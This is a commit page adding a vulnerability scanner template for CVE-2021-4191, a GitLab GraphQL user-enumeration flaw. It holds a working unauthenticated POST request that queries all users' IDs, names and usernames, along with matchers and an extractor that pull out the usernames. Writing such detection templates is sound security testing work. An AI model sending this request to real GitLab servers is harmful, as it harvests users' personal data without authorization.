Merge pull request #3837 from zsusac/CVE-2021-4191

Add template for CVE-2021-4191
2022-03-05 13:45:03 +05:30 · 2022-03-05 13:45:03 +05:30 · 8b847350df
parent 71172d6eb9 faea03749e
commit 8b847350df
1 changed files with 49 additions and 0 deletions
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@ -0,0 +1,49 @@
+id: CVE-2021-4191
+
+info:
+  name: GitLab GraphQL API User Enumeration
+  author: zsusac
+  severity: medium
+  description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
+  reference:
+    - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
+    - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
+  classification:
+    cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2021-4191
+    cwe-id: CWE-359
+  tags: cve,cve2022,gitlab,api,graphql,enum,unauth
+
+requests:
+  - raw:
+      - |
+        POST /api/graphql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: */*
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/-/graphql-explorer
+
+        {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n#     {\n#       field(arg: \"value\") {\n#         subField\n#       }\n#     }\n#\n# Keyboard shortcuts:\n#\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\n#\n#       Run Query:  Ctrl-Enter (or press the play button above)\n#\n#   Auto Complete:  Ctrl-Space (or just start typing)\n#\n\n{\n  users {\n    nodes {\n      id\n      name\n      username\n    }\n  }\n}","variables":null,"operationName":null}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"data"'
+          - '"users"'
+          - '"nodes"'
+          - '"id"'
+          - 'gid://'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        json:
+          - '.data.users.nodes[].username'